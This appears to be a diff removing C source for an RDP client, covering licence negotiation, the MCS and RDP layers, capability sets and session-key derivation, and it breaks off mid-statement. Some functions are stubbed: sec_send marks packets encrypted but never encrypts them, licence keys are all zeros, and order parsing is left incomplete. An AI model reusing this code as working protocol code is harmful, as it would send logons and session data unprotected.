-/* Send a licence request packet */ -static void -licence_send_request(uint8 * client_random, uint8 * rsa_data, char *user, char *host) -{ - uint32 sec_flags = SEC_LICENCE_NEG; - uint16 userlen = strlen(user) + 1; - uint16 hostlen = strlen(host) + 1; - uint16 length = 128 + userlen + hostlen; - STREAM s; - - s = sec_init(sec_flags, length + 2); - - out_uint16_le(s, LICENCE_TAG_REQUEST); - out_uint16_le(s, length); - - out_uint32_le(s, 1); - out_uint16(s, 0); - out_uint16_le(s, 0xff01); - - out_uint8p(s, client_random, SEC_RANDOM_SIZE); - out_uint16(s, 0); - out_uint16_le(s, (SEC_MODULUS_SIZE + SEC_PADDING_SIZE)); - out_uint8p(s, rsa_data, SEC_MODULUS_SIZE); - out_uint8s(s, SEC_PADDING_SIZE); - - out_uint16(s, LICENCE_TAG_USER); - out_uint16(s, userlen); - out_uint8p(s, user, userlen); - - out_uint16(s, LICENCE_TAG_HOST); - out_uint16(s, hostlen); - out_uint8p(s, host, hostlen); - - s_mark_end(s); - sec_send(s, sec_flags); -} - -/* Process a licence demand packet */ -static void -licence_process_demand(STREAM s) -{ - uint8 null_data[SEC_MODULUS_SIZE]; - uint8 *server_random; -#ifdef SAVE_LICENCE - uint8 signature[LICENCE_SIGNATURE_SIZE]; - uint8 hwid[LICENCE_HWID_SIZE]; - uint8 *licence_data; - int licence_size; - RC4_KEY crypt_key; -#endif - - /* Retrieve the server random from the incoming packet */ - in_uint8p(s, server_random, SEC_RANDOM_SIZE); - - /* We currently use null client keys. This is a bit naughty but, hey, - the security of licence negotiation isn't exactly paramount. */ - memset(null_data, 0, sizeof(null_data)); - licence_generate_keys(null_data, server_random, null_data); - -#ifdef SAVE_LICENCE - licence_size = load_licence(&licence_data); - if (licence_size != -1) - { - /* Generate a signature for the HWID buffer */ - licence_generate_hwid(hwid); - sec_sign(signature, 16, licence_sign_key, 16, hwid, sizeof(hwid)); - - /* Now encrypt the HWID */ - RC4_set_key(&crypt_key, 16, licence_key); - RC4(&crypt_key, sizeof(hwid), hwid, hwid); - - licence_present(null_data, null_data, licence_data, licence_size, hwid, signature); - xfree(licence_data); - return; - } -#endif - - licence_send_request(null_data, null_data, username, hostname); -} - - -/* Process a licence packet */ -void -licence_process(STREAM s) -{ - uint16 tag; - - in_uint16_le(s, tag); - in_uint8s(s, 2); /* length */ - - switch (tag) - { - case LICENCE_TAG_DEMAND: - - licence_process_demand(s); - break; - - case LICENCE_TAG_AUTHREQ: -// licence_process_authreq(s); - break; - - case LICENCE_TAG_ISSUE: -// licence_process_issue(s); - break; - - case LICENCE_TAG_REISSUE: - break; - - case LICENCE_TAG_RESULT: - break; - - - } -} - - -/* Establish a connection up to the MCS layer */ -BOOL -mcs_connect(char *server, STREAM mcs_data) -{ - if (!iso_connect(server)) - return False; - - mcs_send_connect_initial(mcs_data); - if (!mcs_recv_connect_response(mcs_data)) - goto error; - - mcs_send_edrq(); - - mcs_send_aurq(); - if (!mcs_recv_aucf(&mcs_userid)) - goto error; - - mcs_send_cjrq(mcs_userid + 1001); - if (!mcs_recv_cjcf()) - goto error; - - mcs_send_cjrq(MCS_GLOBAL_CHANNEL); - if (!mcs_recv_cjcf()) - goto error; - - return True; - - error: - iso_disconnect(); - return False; -} - -/* Disconnect from the MCS layer */ -void -mcs_disconnect(void) -{ - iso_disconnect(); -} - - - -/* Initialise an MCS transport data packet */ -STREAM -mcs_init(int length) -{ - STREAM s; - - s = iso_init(length + 8); - s_push_layer(s, mcs_hdr, 8); - - return s; -} - - -/* Output a DOMAIN_PARAMS structure (ASN.1 BER) */ -static void -mcs_out_domain_params(STREAM s, int max_channels, int max_users, int max_tokens, int max_pdusize) -{ - ber_out_header(s, MCS_TAG_DOMAIN_PARAMS, 32); - ber_out_integer(s, max_channels); - ber_out_integer(s, max_users); - ber_out_integer(s, max_tokens); - ber_out_integer(s, 1); /* num_priorities */ - ber_out_integer(s, 0); /* min_throughput */ - ber_out_integer(s, 1); /* max_height */ - ber_out_integer(s, max_pdusize); - ber_out_integer(s, 2); /* ver_protocol */ -} - - - - -/* Receive an MCS transport data packet */ -STREAM -mcs_recv(void) -{ - uint8 opcode, appid, length; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return NULL; - - in_uint8(s, opcode); - appid = opcode >> 2; - if (appid != MCS_SDIN) - { - if (appid != MCS_DPUM) - { - error("expected data, got %d\n", opcode); - } - return NULL; - } - - in_uint8s(s, 5); /* userid, chanid, flags */ - in_uint8(s, length); - if (length & 0x80) - in_uint8s(s, 1); /* second byte of length */ - - return s; -} - - - -/* Expect a AUcf message (ASN.1 PER) */ -static BOOL -mcs_recv_aucf(uint16 * mcs_userid) -{ - uint8 opcode, result; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return False; - - in_uint8(s, opcode); - if ((opcode >> 2) != MCS_AUCF) - { - error("expected AUcf, got %d\n", opcode); - return False; - } - - in_uint8(s, result); - if (result != 0) - { - error("AUrq: %d\n", result); - return False; - } - - if (opcode & 2) - in_uint16_be(s, *mcs_userid); - - return s_check_end(s); -} - - -/* Expect a CJcf message (ASN.1 PER) */ -static BOOL -mcs_recv_cjcf(void) -{ - uint8 opcode, result; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return False; - - in_uint8(s, opcode); - if ((opcode >> 2) != MCS_CJCF) - { - error("expected CJcf, got %d\n", opcode); - return False; - } - - in_uint8(s, result); - if (result != 0) - { - error("CJrq: %d\n", result); - return False; - } - - in_uint8s(s, 4); /* mcs_userid, req_chanid */ - if (opcode & 2) - in_uint8s(s, 2); /* join_chanid */ - - return s_check_end(s); -} - - -/* Parse a DOMAIN_PARAMS structure (ASN.1 BER) */ -static BOOL -mcs_parse_domain_params(STREAM s) -{ - int length; - - ber_parse_header(s, MCS_TAG_DOMAIN_PARAMS, &length); - in_uint8s(s, length); - - return s_check(s); -} - - -/* Expect a MCS_CONNECT_RESPONSE message (ASN.1 BER) */ -static BOOL -mcs_recv_connect_response(STREAM mcs_data) -{ - uint8 result; - int length; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return False; - - ber_parse_header(s, MCS_CONNECT_RESPONSE, &length); - - ber_parse_header(s, BER_TAG_RESULT, &length); - in_uint8(s, result); - if (result != 0) - { - error("MCS connect: %d\n", result); - return False; - } - - ber_parse_header(s, BER_TAG_INTEGER, &length); - in_uint8s(s, length); /* connect id */ - - mcs_parse_domain_params(s); - - ber_parse_header(s, BER_TAG_OCTET_STRING, &length); - if (length > mcs_data->size) - { - error("MCS data length %d\n", length); - length = mcs_data->size; - } - - in_uint8a(s, mcs_data->data, length); - mcs_data->p = mcs_data->data; - mcs_data->end = mcs_data->data + length; - - return s_check_end(s); -} - - -/* Send an MCS transport data packet */ -void -mcs_send(STREAM s) -{ - uint16 length; - - s_pop_layer(s, mcs_hdr); - length = s->end - s->p - 8; - length |= 0x8000; - - out_uint8(s, (MCS_SDRQ << 2)); - out_uint16_be(s, mcs_userid); - out_uint16_be(s, MCS_GLOBAL_CHANNEL); - out_uint8(s, 0x70); /* flags */ - out_uint16_be(s, length); - - iso_send(s); -} - - -/* Send an AUrq message (ASN.1 PER) */ -static void -mcs_send_aurq(void) -{ - STREAM s; - - s = iso_init(1); - - out_uint8(s, (MCS_AURQ << 2)); - - s_mark_end(s); - iso_send(s); -} - - -/* Send a CJrq message (ASN.1 PER) */ -static void -mcs_send_cjrq(uint16 chanid) -{ - STREAM s; - - s = iso_init(5); - - out_uint8(s, (MCS_CJRQ << 2)); - out_uint16_be(s, mcs_userid); - out_uint16_be(s, chanid); - - s_mark_end(s); - iso_send(s); -} - - -/* Send an MCS_CONNECT_INITIAL message (ASN.1 BER) */ -static void -mcs_send_connect_initial(STREAM mcs_data) -{ - int datalen = mcs_data->end - mcs_data->data; - int length = 7 + 3 * 34 + 4 + datalen; - STREAM s; - - s = iso_init(length + 5); - - ber_out_header(s, MCS_CONNECT_INITIAL, length); - ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* calling domain */ - ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* called domain */ - - ber_out_header(s, BER_TAG_BOOLEAN, 1); - out_uint8(s, 0xff); /* upward flag */ - - mcs_out_domain_params(s, 2, 2, 0, 0xffff); /* target params */ - mcs_out_domain_params(s, 1, 1, 1, 0x420); /* min params */ - mcs_out_domain_params(s, 0xffff, 0xfc17, 0xffff, 0xffff); /* max params */ - - ber_out_header(s, BER_TAG_OCTET_STRING, datalen); - out_uint8p(s, mcs_data->data, datalen); - - s_mark_end(s); - iso_send(s); -} - - -/* Send an EDrq message (ASN.1 PER) */ -static void -mcs_send_edrq(void) -{ - STREAM s; - - s = iso_init(5); - - out_uint8(s, (MCS_EDRQ << 2)); - out_uint16_be(s, 1); /* height */ - out_uint16_be(s, 1); /* interval */ - - s_mark_end(s); - iso_send(s); -} - - -/* Process data PDU */ -static void -process_data_pdu(STREAM s) -{ - uint8 data_pdu_type; - - in_uint8s(s, 8); /* shareid, pad, streamid, length */ - in_uint8(s, data_pdu_type); - in_uint8s(s, 3); /* compress_type, compress_len */ - - switch (data_pdu_type) - { - case RDP_DATA_PDU_UPDATE: - process_update_pdu(s); - break; - - case RDP_DATA_PDU_POINTER: - //process_pointer_pdu(s); - break; - - case RDP_DATA_PDU_BELL: - //ui_bell(); - break; - - case RDP_DATA_PDU_LOGON: - /* User logged on */ - break; - - } -} - - -/* Respond to a demand active PDU */ -static void -process_demand_active(STREAM s) -{ - uint8 type; - - in_uint32_le(s, rdp_shareid); - - - - rdp_send_confirm_active(); - rdp_send_synchronise(); - rdp_send_control(RDP_CTL_COOPERATE); - rdp_send_control(RDP_CTL_REQUEST_CONTROL); - rdp_recv(&type); /* RDP_PDU_SYNCHRONIZE */ - rdp_recv(&type); /* RDP_CTL_COOPERATE */ - rdp_recv(&type); /* RDP_CTL_GRANT_CONTROL */ - rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, 0, 0); - rdp_send_fonts(1); - rdp_send_fonts(2); - rdp_recv(&type); /* RDP_PDU_UNKNOWN 0x28 */ - reset_order_state(); -} - - -/* Process an order PDU */ -void -process_orders(STREAM s) -{ - RDP_ORDER_STATE *os = &order_state; - uint32 present; - uint16 num_orders; - uint8 order_flags; - int size, processed = 0; - BOOL delta; - - in_uint8s(s, 2); /* pad */ - in_uint16_le(s, num_orders); - in_uint8s(s, 2); /* pad */ - - while (processed < num_orders) - { - in_uint8(s, order_flags); - - if (!(order_flags & RDP_ORDER_STANDARD)) - { - error("order parsing failed\n"); - break; - } - - if (order_flags & RDP_ORDER_SECONDARY) - { - process_secondary_order(s); - } - else - { - if (order_flags & RDP_ORDER_CHANGE) - { - in_uint8(s, os->order_type); - } - - switch (os->order_type) - { - case RDP_ORDER_TRIBLT: - case RDP_ORDER_TEXT2: - size = 3; - break; - - case RDP_ORDER_PATBLT: - case RDP_ORDER_MEMBLT: - case RDP_ORDER_LINE: - size = 2; - break; - - default: - size = 1; - } - - - delta = order_flags & RDP_ORDER_DELTA; - - } - processed++; - } - - if (s->p != next_packet) - error("%d bytes remaining\n", (int) (next_packet - s->p)); -} - - -/* Process a secondary order */ -static void -process_secondary_order(STREAM s) -{ - uint16 length; - uint8 type; - uint8 *next_order; - - in_uint16_le(s, length); - in_uint8s(s, 2); /* flags */ - in_uint8(s, type); - next_order = s->p + length + 7; - s->p = next_order; -} - - -/* Process an update PDU */ -static void -process_update_pdu(STREAM s) -{ - uint16 update_type; - - in_uint16_le(s, update_type); - - switch (update_type) - { - case RDP_UPDATE_ORDERS: - process_orders(s); - break; - - case RDP_UPDATE_SYNCHRONIZE: - break; - } -} - - -/* Initialise an RDP packet */ -static STREAM -rdp_init(int maxlen) -{ - STREAM s; - - s = sec_init(encryption ? SEC_ENCRYPT : 0, maxlen + 6); - s_push_layer(s, rdp_hdr, 6); - - return s; -} - -/* Send an RDP packet */ -static void -rdp_send(STREAM s, uint8 pdu_type) -{ - uint16 length; - - s_pop_layer(s, rdp_hdr); - length = s->end - s->p; - - out_uint16_le(s, length); - out_uint16_le(s, (pdu_type | 0x10)); /* Version 1 */ - out_uint16_le(s, (mcs_userid + 1001)); - - sec_send(s, encryption ? SEC_ENCRYPT : 0); -} - -/* Receive an RDP packet */ -static STREAM -rdp_recv(uint8 * type) -{ - static STREAM rdp_s; - uint16 length, pdu_type; - - if ((rdp_s == NULL) || (next_packet >= rdp_s->end)) - { - rdp_s = sec_recv(); - if (rdp_s == NULL) - return NULL; - - next_packet = rdp_s->p; - } - else - { - rdp_s->p = next_packet; - } - - in_uint16_le(rdp_s, length); - /* 32k packets are really 8, keepalive fix */ - if (length == 0x8000) - { - next_packet += 8; - *type = 0; - return rdp_s; - } - in_uint16_le(rdp_s, pdu_type); - in_uint8s(rdp_s, 2); /* userid */ - *type = pdu_type & 0xf; - - - next_packet += length; - return rdp_s; -} - -/* Initialise an RDP data packet */ -static STREAM -rdp_init_data(int maxlen) -{ - STREAM s; - - s = sec_init(encryption ? SEC_ENCRYPT : 0, maxlen + 18); - s_push_layer(s, rdp_hdr, 18); - - return s; -} - -/* Send an RDP data packet */ -static void -rdp_send_data(STREAM s, uint8 data_pdu_type) -{ - uint16 length; - - s_pop_layer(s, rdp_hdr); - length = s->end - s->p; - - out_uint16_le(s, length); - out_uint16_le(s, (RDP_PDU_DATA | 0x10)); - out_uint16_le(s, (mcs_userid + 1001)); - - out_uint32_le(s, rdp_shareid); - out_uint8(s, 0); /* pad */ - out_uint8(s, 1); /* streamid */ - out_uint16_le(s, (length - 14)); - out_uint8(s, data_pdu_type); - out_uint8(s, 0); /* compress_type */ - out_uint16(s, 0); /* compress_len */ - - sec_send(s, encryption ? SEC_ENCRYPT : 0); -} - -/* Output a string in Unicode */ -void -rdp_out_unistr(STREAM s, char *string, int len) -{ - int i = 0, j = 0; - - len += 2; - - while (i < len) - { - s->p[i++] = string[j++]; - s->p[i++] = 0; - } - - s->p += len; -} - -/* Parse a logon info packet */ -static void -rdp_send_logon_info(uint32 flags, char *domain, char *user, - char *password, char *program, char *directory) -{ - int len_domain = 2 * strlen(domain); - int len_user = 2 * strlen(user); - int len_password = 2 * strlen(password); - int len_program = 2 * strlen(program); - int len_directory = 2 * strlen(directory); - uint32 sec_flags = encryption ? (SEC_LOGON_INFO | SEC_ENCRYPT) : SEC_LOGON_INFO; - STREAM s; - - s = sec_init(sec_flags, 18 + len_domain + len_user + len_password - + len_program + len_directory + 10); - - out_uint32(s, 0); - out_uint32_le(s, flags); - out_uint16_le(s, len_domain); - out_uint16_le(s, len_user); - out_uint16_le(s, len_password); - out_uint16_le(s, len_program); - out_uint16_le(s, len_directory); - rdp_out_unistr(s, domain, len_domain); - rdp_out_unistr(s, user, len_user); - rdp_out_unistr(s, password, len_password); - rdp_out_unistr(s, program, len_program); - rdp_out_unistr(s, directory, len_directory); - - s_mark_end(s); - sec_send(s, sec_flags); -} - -/* Send a control PDU */ -static void -rdp_send_control(uint16 action) -{ - STREAM s; - - s = rdp_init_data(8); - - out_uint16_le(s, action); - out_uint16(s, 0); /* userid */ - out_uint32(s, 0); /* control id */ - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_CONTROL); -} - -/* Send a synchronisation PDU */ -static void -rdp_send_synchronise(void) -{ - STREAM s; - - s = rdp_init_data(4); - - out_uint16_le(s, 1); /* type */ - out_uint16_le(s, 1002); - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_SYNCHRONISE); -} - -/* Send a single input event */ -void -rdp_send_input(uint32 time, uint16 message_type, uint16 device_flags, uint16 param1, uint16 param2) -{ - STREAM s; - - s = rdp_init_data(16); - - out_uint16_le(s, 1); /* number of events */ - out_uint16(s, 0); /* pad */ - - out_uint32_le(s, time); - out_uint16_le(s, message_type); - out_uint16_le(s, device_flags); - out_uint16_le(s, param1); - out_uint16_le(s, param2); - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_INPUT); -} - -/* Send an (empty) font information PDU */ -static void -rdp_send_fonts(uint16 seq) -{ - STREAM s; - - s = rdp_init_data(8); - - out_uint16(s, 0); /* number of fonts */ - out_uint16_le(s, 0x3e); /* unknown */ - out_uint16_le(s, seq); /* unknown */ - out_uint16_le(s, 0x32); /* entry size */ - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_FONT2); -} - -/* Output general capability set */ -static void -rdp_out_general_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_GENERAL); - out_uint16_le(s, RDP_CAPLEN_GENERAL); - - out_uint16_le(s, 1); /* OS major type */ - out_uint16_le(s, 3); /* OS minor type */ - out_uint16_le(s, 0x200); /* Protocol version */ - out_uint16(s, 0); /* Pad */ - out_uint16(s, 0); /* Compression types */ - out_uint16(s, 0); /* Pad */ - out_uint16(s, 0); /* Update capability */ - out_uint16(s, 0); /* Remote unshare capability */ - out_uint16(s, 0); /* Compression level */ - out_uint16(s, 0); /* Pad */ -} - -/* Output bitmap capability set */ -static void -rdp_out_bitmap_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_BITMAP); - out_uint16_le(s, RDP_CAPLEN_BITMAP); - - out_uint16_le(s, 8); /* Preferred BPP */ - out_uint16_le(s, 1); /* Receive 1 BPP */ - out_uint16_le(s, 1); /* Receive 4 BPP */ - out_uint16_le(s, 1); /* Receive 8 BPP */ - out_uint16_le(s, 800); /* Desktop width */ - out_uint16_le(s, 600); /* Desktop height */ - out_uint16(s, 0); /* Pad */ - out_uint16(s, 0); /* Allow resize */ - out_uint16_le(s, bitmap_compression ? 1 : 0); /* Support compression */ - out_uint16(s, 0); /* Unknown */ - out_uint16_le(s, 1); /* Unknown */ - out_uint16(s, 0); /* Pad */ -} - -/* Output order capability set */ -static void -rdp_out_order_caps(STREAM s) -{ - uint8 order_caps[32]; - - - memset(order_caps, 0, 32); - order_caps[0] = 1; /* dest blt */ - order_caps[1] = 1; /* pat blt */ - order_caps[2] = 1; /* screen blt */ - order_caps[3] = 1; /* required for memblt? */ - order_caps[8] = 1; /* line */ - order_caps[9] = 1; /* line */ - order_caps[10] = 1; /* rect */ - order_caps[11] = (desktop_save == False ? 0 : 1); /* desksave */ - order_caps[13] = 1; /* memblt */ - order_caps[14] = 1; /* triblt */ - order_caps[22] = 1; /* polyline */ - order_caps[27] = 1; /* text2 */ - out_uint16_le(s, RDP_CAPSET_ORDER); - out_uint16_le(s, RDP_CAPLEN_ORDER); - - out_uint8s(s, 20); /* Terminal desc, pad */ - out_uint16_le(s, 1); /* Cache X granularity */ - out_uint16_le(s, 20); /* Cache Y granularity */ - out_uint16(s, 0); /* Pad */ - out_uint16_le(s, 1); /* Max order level */ - out_uint16_le(s, 0x147); /* Number of fonts */ - out_uint16_le(s, 0x2a); /* Capability flags */ - out_uint8p(s, order_caps, 32); /* Orders supported */ - out_uint16_le(s, 0x6a1); /* Text capability flags */ - out_uint8s(s, 6); /* Pad */ - out_uint32_le(s, desktop_save == False ? 0 : 0x38400); /* Desktop cache size */ - out_uint32(s, 0); /* Unknown */ - out_uint32_le(s, 0x4e4); /* Unknown */ -} - -/* Output bitmap cache capability set */ -static void -rdp_out_bmpcache_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_BMPCACHE); - out_uint16_le(s, RDP_CAPLEN_BMPCACHE); - - out_uint8s(s, 24); /* unused */ - out_uint16_le(s, 0x258); /* entries */ - out_uint16_le(s, 0x100); /* max cell size */ - out_uint16_le(s, 0x12c); /* entries */ - out_uint16_le(s, 0x400); /* max cell size */ - out_uint16_le(s, 0x106); /* entries */ - out_uint16_le(s, 0x1000); /* max cell size */ -} - -/* Output control capability set */ -static void -rdp_out_control_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_CONTROL); - out_uint16_le(s, RDP_CAPLEN_CONTROL); - - out_uint16(s, 0); /* Control capabilities */ - out_uint16(s, 0); /* Remote detach */ - out_uint16_le(s, 2); /* Control interest */ - out_uint16_le(s, 2); /* Detach interest */ -} - -/* Output activation capability set */ -static void -rdp_out_activate_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_ACTIVATE); - out_uint16_le(s, RDP_CAPLEN_ACTIVATE); - - out_uint16(s, 0); /* Help key */ - out_uint16(s, 0); /* Help index key */ - out_uint16(s, 0); /* Extended help key */ - out_uint16(s, 0); /* Window activate */ -} - -/* Output pointer capability set */ -static void -rdp_out_pointer_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_POINTER); - out_uint16_le(s, RDP_CAPLEN_POINTER); - - out_uint16(s, 0); /* Colour pointer */ - out_uint16_le(s, 20); /* Cache size */ -} - -/* Output share capability set */ -static void -rdp_out_share_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_SHARE); - out_uint16_le(s, RDP_CAPLEN_SHARE); - - out_uint16(s, 0); /* userid */ - out_uint16(s, 0); /* pad */ -} - -/* Output colour cache capability set */ -static void -rdp_out_colcache_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_COLCACHE); - out_uint16_le(s, RDP_CAPLEN_COLCACHE); - - out_uint16_le(s, 6); /* cache size */ - out_uint16(s, 0); /* pad */ -} - -static uint8 canned_caps[] = { - 0x01, 0x00, 0x00, 0x00, 0x09, 0x04, 0x00, 0x00, 0x04, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x0C, 0x00, 0x08, 0x00, 0x01, - 0x00, 0x00, 0x00, 0x0E, 0x00, 0x08, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x10, 0x00, 0x34, 0x00, 0xFE, - 0x00, 0x04, 0x00, 0xFE, 0x00, 0x04, 0x00, 0xFE, 0x00, 0x08, 0x00, - 0xFE, 0x00, 0x08, 0x00, 0xFE, - 0x00, 0x10, 0x00, 0xFE, 0x00, 0x20, 0x00, 0xFE, 0x00, 0x40, 0x00, - 0xFE, 0x00, 0x80, 0x00, 0xFE, - 0x00, 0x00, 0x01, 0x40, 0x00, 0x00, 0x08, 0x00, 0x01, 0x00, 0x01, - 0x02, 0x00, 0x00, 0x00 -}; - -/* Output unknown capability set */ -static void -rdp_out_unknown_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_UNKNOWN); - out_uint16_le(s, 0x58); - - out_uint8p(s, canned_caps, RDP_CAPLEN_UNKNOWN - 4); -} - -/* Send a confirm active PDU */ -static void -rdp_send_confirm_active(void) -{ - STREAM s; - uint16 caplen = - RDP_CAPLEN_GENERAL + RDP_CAPLEN_BITMAP + RDP_CAPLEN_ORDER + - RDP_CAPLEN_BMPCACHE + RDP_CAPLEN_COLCACHE + - RDP_CAPLEN_ACTIVATE + RDP_CAPLEN_CONTROL + - RDP_CAPLEN_POINTER + RDP_CAPLEN_SHARE + RDP_CAPLEN_UNKNOWN + 4 /* w2k fix, why? */ ; - - s = rdp_init(14 + caplen + sizeof(RDP_SOURCE)); - - out_uint32_le(s, rdp_shareid); - out_uint16_le(s, 0x3ea); /* userid */ - out_uint16_le(s, sizeof(RDP_SOURCE)); - out_uint16_le(s, caplen); - - out_uint8p(s, RDP_SOURCE, sizeof(RDP_SOURCE)); - out_uint16_le(s, 0xd); /* num_caps */ - out_uint8s(s, 2); /* pad */ - - rdp_out_general_caps(s); - rdp_out_bitmap_caps(s); - rdp_out_order_caps(s); - rdp_out_bmpcache_caps(s); - rdp_out_colcache_caps(s); - rdp_out_activate_caps(s); - rdp_out_control_caps(s); - rdp_out_pointer_caps(s); - rdp_out_share_caps(s); - rdp_out_unknown_caps(s); - - s_mark_end(s); - rdp_send(s, RDP_PDU_CONFIRM_ACTIVE); -} - - - -/* Process incoming packets */ -void -rdp_main_loop(void) -{ - uint8 type; - STREAM s; - - while ((s = rdp_recv(&type)) != NULL) - { - switch (type) - { - case RDP_PDU_DEMAND_ACTIVE: - process_demand_active(s); - break; - - case RDP_PDU_DEACTIVATE: - break; - - case RDP_PDU_DATA: - process_data_pdu(s); - break; - case 0: - break; - - } - } -} - -/* Establish a connection up to the RDP layer */ -BOOL -rdp_connect(char *server, uint32 flags, char *domain, char *password, - char *command, char *directory) -{ - if (!sec_connect(server)) - return False; - - rdp_send_logon_info(flags, domain, username, password, command, directory); - return True; -} - -/* Disconnect from the RDP layer */ -void -rdp_disconnect(void) -{ - sec_disconnect(); -} - - - -/* Reset order state */ -void -reset_order_state(void) -{ - memset(&order_state, 0, sizeof(order_state)); - order_state.order_type = RDP_ORDER_PATBLT; -} - - -static void -reverse(uint8 * p, int len) -{ - int i, j; - uint8 temp; - - for (i = 0, j = len - 1; i < j; i++, j--) - { - temp = p[i]; - p[i] = p[j]; - p[j] = temp; - } -} - - -/* - * General purpose 48-byte transformation, using two 32-byte salts (generally, - * a client and server salt) and a global salt value used for padding. - * Both SHA1 and MD5 algorithms are used. - */ -void -sec_hash_48(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2, uint8 salt) -{ - uint8 shasig[20]; - uint8 pad[4]; - SHA_CTX sha; - MD5_CTX md5; - int i; - - for (i = 0; i < 3; i++) - { - memset(pad, salt + i, i + 1); - - SHA1_Init(&sha); - SHA1_Update(&sha, pad, i + 1); - SHA1_Update(&sha, in, 48); - SHA1_Update(&sha, salt1, 32); - SHA1_Update(&sha, salt2, 32); - SHA1_Final(shasig, &sha); - - MD5_Init(&md5); - MD5_Update(&md5, in, 48); - MD5_Update(&md5, shasig, 20); - MD5_Final(&out[i * 16], &md5); - } -} - -/* - * Weaker 16-byte transformation, also using two 32-byte salts, but - * only using a single round of MD5. - */ -void -sec_hash_16(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2) -{ - MD5_CTX md5; - - MD5_Init(&md5); - MD5_Update(&md5, in, 16); - MD5_Update(&md5, salt1, 32); - MD5_Update(&md5, salt2, 32); - MD5_Final(out, &md5); -} - -/* Reduce key entropy from 64 to 40 bits */ -static void -sec_make_40bit(uint8 * key) -{ - key[0] = 0xd1; - key[1] = 0x26; - key[2] = 0x9e; -} - -/* Generate a session key and RC4 keys, given client and server randoms */ -static void -sec_generate_keys(uint8 * client_key, uint8 * server_key, int rc4_key_size) -{ - uint8 session_key[48]; - uint8 temp_hash[48]; - uint8 input[48]; - - /* Construct input data to hash */ - memcpy(input, client_key, 24); - memcpy(input + 24, server_key, 24); - - /* Generate session key - two rounds of sec_hash_48 */ - sec_hash_48(temp_hash, input, client_key, server_key, 65); - sec_hash_48(session_key, temp_hash, client_key, server_key, 88); - - /* Store first 16 bytes of session key, for generating signatures */ - memcpy(sec_sign_key, session_key, 16); - - /* Generate RC4 keys */ - sec_hash_16(sec_decrypt_key, &session_key[16], client_key, server_key); - sec_hash_16(sec_encrypt_key, &session_key[32], client_key, server_key); - - if (rc4_key_size == 1) - { - - sec_make_40bit(sec_sign_key); - sec_make_40bit(sec_decrypt_key); - sec_make_40bit(sec_encrypt_key); - rc4_key_len = 8; - } - else - { - - rc4_key_len = 16; - } - - /* Save initial RC4 keys as update keys */ - memcpy(sec_decrypt_update_key, sec_decrypt_key, 16); - memcpy(sec_encrypt_update_key, sec_encrypt_key, 16); - - /* Initialise RC4 state arrays */ - RC4_set_key(&rc4_decrypt_key, rc4_key_len, sec_decrypt_key); - RC4_set_key(&rc4_encrypt_key, rc4_key_len, sec_encrypt_key); -} - -static uint8 pad_54[40] = { - 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, - 54, 54, 54, - 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, - 54, 54, 54 -}; - -static uint8 pad_92[48] = { - 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, - 92, 92, 92, 92, 92, 92, 92, - 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, - 92, 92, 92, 92, 92, 92, 92 -}; - - -/* Transmit secure transport packet */ -void -sec_send(STREAM s, uint32 flags) -{ - int datalen; - - s_pop_layer(s, sec_hdr); - if (!licence_issued || (flags & SEC_ENCRYPT)) - out_uint32_le(s, flags); - - if (flags & SEC_ENCRYPT) - { - flags &= ~SEC_ENCRYPT; - datalen = s->end - s->p - 8; - -#if WITH_DEBUG - DEBUG(("Sending encrypted packet:\n")); - hexdump(s->p + 8, datalen); -#endif - - - } - - mcs_send(s); -} - - -/* Perform an RSA public key encryption operation */ -static void -sec_rsa_encrypt(uint8 * out, uint8 * in, int len, uint8 * modulus, uint8 * exponent) -{ - BN_CTX *ctx; - BIGNUM mod, exp, x, y; - uint8 inr[SEC_MODULUS_SIZE]; - int outlen; - - reverse(modulus, SEC_MODULUS_SIZE); - reverse(exponent, SEC_EXPONENT_SIZE); - memcpy(inr, in, len); - reverse(inr, len); - - ctx = BN_CTX_new(); - BN_init(&mod); - BN_init(&exp); - BN_init(&x); - BN_init(&y); - - BN_bin2bn(modulus, SEC_MODULUS_SIZE, &mod); - BN_bin2bn(exponent, SEC_EXPONENT_SIZE, &exp); - BN_bin2bn(inr, len, &x); - BN_mod_exp(&y, &x, &exp, &mod, ctx); - outlen = 